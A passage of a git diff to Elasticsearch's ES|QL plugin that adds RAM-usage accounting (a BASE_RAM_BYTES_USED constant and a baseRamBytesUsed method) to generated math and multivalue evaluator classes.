*/ public final class ScalbConstantLongEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(ScalbConstantLongEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator d; @@ -52,6 +55,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += d.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public DoubleBlock eval(int positionCount, DoubleBlock dBlock) { try(DoubleBlock.Builder result = driverContext.blockFactory().newDoubleBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/ScalbIntEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/ScalbIntEvaluator.java index 510f736f55a32..351939e4cfe02 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/ScalbIntEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/ScalbIntEvaluator.java @@ -8,6 +8,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.DoubleBlock; import org.elasticsearch.compute.data.DoubleVector; @@ -25,6 +26,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class ScalbIntEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(ScalbIntEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator d; @@ -60,6 +63,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += d.baseRamBytesUsed(); + baseRamBytesUsed += scaleFactor.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public DoubleBlock eval(int positionCount, DoubleBlock dBlock, IntBlock scaleFactorBlock) { try(DoubleBlock.Builder result = driverContext.blockFactory().newDoubleBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/ScalbLongEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/ScalbLongEvaluator.java index 7e24b28332dc3..e0a9847dcfabe 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/ScalbLongEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/ScalbLongEvaluator.java @@ -8,6 +8,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.DoubleBlock; import org.elasticsearch.compute.data.DoubleVector; @@ -25,6 +26,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. 
*/ public final class ScalbLongEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(ScalbLongEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator d; @@ -60,6 +63,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += d.baseRamBytesUsed(); + baseRamBytesUsed += scaleFactor.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public DoubleBlock eval(int positionCount, DoubleBlock dBlock, LongBlock scaleFactorBlock) { try(DoubleBlock.Builder result = driverContext.blockFactory().newDoubleBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/SignumDoubleEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/SignumDoubleEvaluator.java index 9f73c895b6f42..0bffb5dcde163 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/SignumDoubleEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/SignumDoubleEvaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.DoubleBlock; import org.elasticsearch.compute.data.DoubleVector; @@ -22,6 +23,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class SignumDoubleEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(SignumDoubleEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator val; @@ -48,6 +51,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += val.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public DoubleBlock eval(int positionCount, DoubleBlock valBlock) { try(DoubleBlock.Builder result = driverContext.blockFactory().newDoubleBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/SignumIntEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/SignumIntEvaluator.java index e6a270c3e344d..0b465adb418ee 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/SignumIntEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/SignumIntEvaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.DoubleBlock; import org.elasticsearch.compute.data.DoubleVector; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. 
*/ public final class SignumIntEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(SignumIntEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator val; @@ -50,6 +53,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += val.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public DoubleBlock eval(int positionCount, IntBlock valBlock) { try(DoubleBlock.Builder result = driverContext.blockFactory().newDoubleBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/SignumLongEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/SignumLongEvaluator.java index 35569ecd80476..41697ff774ac7 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/SignumLongEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/SignumLongEvaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.DoubleBlock; import org.elasticsearch.compute.data.DoubleVector; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class SignumLongEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(SignumLongEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator val; @@ -50,6 +53,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += val.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public DoubleBlock eval(int positionCount, LongBlock valBlock) { try(DoubleBlock.Builder result = driverContext.blockFactory().newDoubleBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/SignumUnsignedLongEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/SignumUnsignedLongEvaluator.java index 677a8ec1fe6b5..15cd1011c10a4 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/SignumUnsignedLongEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/SignumUnsignedLongEvaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.DoubleBlock; import org.elasticsearch.compute.data.DoubleVector; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. 
*/ public final class SignumUnsignedLongEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(SignumUnsignedLongEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator val; @@ -50,6 +53,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += val.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public DoubleBlock eval(int positionCount, LongBlock valBlock) { try(DoubleBlock.Builder result = driverContext.blockFactory().newDoubleBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/SinEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/SinEvaluator.java index 51514290e8254..8cdd34ba8a5f8 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/SinEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/SinEvaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.DoubleBlock; import org.elasticsearch.compute.data.DoubleVector; @@ -22,6 +23,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class SinEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(SinEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator val; @@ -48,6 +51,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += val.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public DoubleBlock eval(int positionCount, DoubleBlock valBlock) { try(DoubleBlock.Builder result = driverContext.blockFactory().newDoubleBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/SinhEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/SinhEvaluator.java index 99a6afb3b1843..4cbd0e4574bf6 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/SinhEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/SinhEvaluator.java @@ -8,6 +8,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.DoubleBlock; import org.elasticsearch.compute.data.DoubleVector; @@ -23,6 +24,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. 
*/ public final class SinhEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(SinhEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator val; @@ -49,6 +52,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += val.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public DoubleBlock eval(int positionCount, DoubleBlock valBlock) { try(DoubleBlock.Builder result = driverContext.blockFactory().newDoubleBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/SqrtDoubleEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/SqrtDoubleEvaluator.java index 30fa92073cc29..5da23a5272c6b 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/SqrtDoubleEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/SqrtDoubleEvaluator.java @@ -8,6 +8,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.DoubleBlock; import org.elasticsearch.compute.data.DoubleVector; @@ -23,6 +24,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class SqrtDoubleEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(SqrtDoubleEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator val; @@ -49,6 +52,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += val.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public DoubleBlock eval(int positionCount, DoubleBlock valBlock) { try(DoubleBlock.Builder result = driverContext.blockFactory().newDoubleBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/SqrtIntEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/SqrtIntEvaluator.java index f2e8c3c14bc2b..edd3271ba48f5 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/SqrtIntEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/SqrtIntEvaluator.java @@ -8,6 +8,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.DoubleBlock; import org.elasticsearch.compute.data.IntBlock; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. 
*/ public final class SqrtIntEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(SqrtIntEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator val; @@ -50,6 +53,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += val.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public DoubleBlock eval(int positionCount, IntBlock valBlock) { try(DoubleBlock.Builder result = driverContext.blockFactory().newDoubleBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/SqrtLongEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/SqrtLongEvaluator.java index 040ddae13ce5f..ab14c1d407670 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/SqrtLongEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/SqrtLongEvaluator.java @@ -8,6 +8,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.DoubleBlock; import org.elasticsearch.compute.data.LongBlock; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class SqrtLongEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(SqrtLongEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator val; @@ -50,6 +53,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += val.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public DoubleBlock eval(int positionCount, LongBlock valBlock) { try(DoubleBlock.Builder result = driverContext.blockFactory().newDoubleBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/SqrtUnsignedLongEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/SqrtUnsignedLongEvaluator.java index 21d026cb44c07..7d2c5335f0dcf 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/SqrtUnsignedLongEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/SqrtUnsignedLongEvaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.DoubleBlock; import org.elasticsearch.compute.data.DoubleVector; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. 
*/ public final class SqrtUnsignedLongEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(SqrtUnsignedLongEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator val; @@ -50,6 +53,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += val.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public DoubleBlock eval(int positionCount, LongBlock valBlock) { try(DoubleBlock.Builder result = driverContext.blockFactory().newDoubleBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/TanEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/TanEvaluator.java index 978d202c7f3ce..c8af90bc9a3d1 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/TanEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/TanEvaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.DoubleBlock; import org.elasticsearch.compute.data.DoubleVector; @@ -22,6 +23,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class TanEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(TanEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator val; @@ -48,6 +51,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += val.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public DoubleBlock eval(int positionCount, DoubleBlock valBlock) { try(DoubleBlock.Builder result = driverContext.blockFactory().newDoubleBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/TanhEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/TanhEvaluator.java index a7b594d130ba4..bc3b7a4856cab 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/TanhEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/TanhEvaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.DoubleBlock; import org.elasticsearch.compute.data.DoubleVector; @@ -22,6 +23,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. 
*/ public final class TanhEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(TanhEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator val; @@ -48,6 +51,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += val.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public DoubleBlock eval(int positionCount, DoubleBlock valBlock) { try(DoubleBlock.Builder result = driverContext.blockFactory().newDoubleBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvAppendBooleanEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvAppendBooleanEvaluator.java index c126bd7bef196..b77ae1c09167c 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvAppendBooleanEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvAppendBooleanEvaluator.java @@ -6,6 +6,7 @@ import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BooleanBlock; import org.elasticsearch.compute.data.Page; @@ -20,6 +21,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class MvAppendBooleanEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(MvAppendBooleanEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator field1; @@ -47,6 +50,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += field1.baseRamBytesUsed(); + baseRamBytesUsed += field2.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BooleanBlock eval(int positionCount, BooleanBlock field1Block, BooleanBlock field2Block) { try(BooleanBlock.Builder result = driverContext.blockFactory().newBooleanBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvAppendBytesRefEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvAppendBytesRefEvaluator.java index 3afd3534b92f6..6ccd1110f74bb 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvAppendBytesRefEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvAppendBytesRefEvaluator.java @@ -6,6 +6,7 @@ import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BytesRefBlock; import org.elasticsearch.compute.data.Page; @@ -20,6 +21,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. 
*/ public final class MvAppendBytesRefEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(MvAppendBytesRefEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator field1; @@ -47,6 +50,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += field1.baseRamBytesUsed(); + baseRamBytesUsed += field2.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BytesRefBlock eval(int positionCount, BytesRefBlock field1Block, BytesRefBlock field2Block) { try(BytesRefBlock.Builder result = driverContext.blockFactory().newBytesRefBlockBuilder(positionCount)) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvAppendDoubleEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvAppendDoubleEvaluator.java index 315150a20e354..13703a6937c36 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvAppendDoubleEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvAppendDoubleEvaluator.java @@ -6,6 +6,7 @@ import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.DoubleBlock; import org.elasticsearch.compute.data.Page; @@ -20,6 +21,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class MvAppendDoubleEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(MvAppendDoubleEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator field1; @@ -47,6 +50,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += field1.baseRamBytesUsed(); + baseRamBytesUsed += field2.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public DoubleBlock eval(int positionCount, DoubleBlock field1Block, DoubleBlock field2Block) { try(DoubleBlock.Builder result = driverContext.blockFactory().newDoubleBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvAppendIntEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvAppendIntEvaluator.java index 0291e8c07d9ff..62d28b4609c97 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvAppendIntEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvAppendIntEvaluator.java @@ -6,6 +6,7 @@ import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.IntBlock; import org.elasticsearch.compute.data.Page; @@ -20,6 +21,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. 
*/ public final class MvAppendIntEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(MvAppendIntEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator field1; @@ -47,6 +50,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += field1.baseRamBytesUsed(); + baseRamBytesUsed += field2.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public IntBlock eval(int positionCount, IntBlock field1Block, IntBlock field2Block) { try(IntBlock.Builder result = driverContext.blockFactory().newIntBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvAppendLongEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvAppendLongEvaluator.java 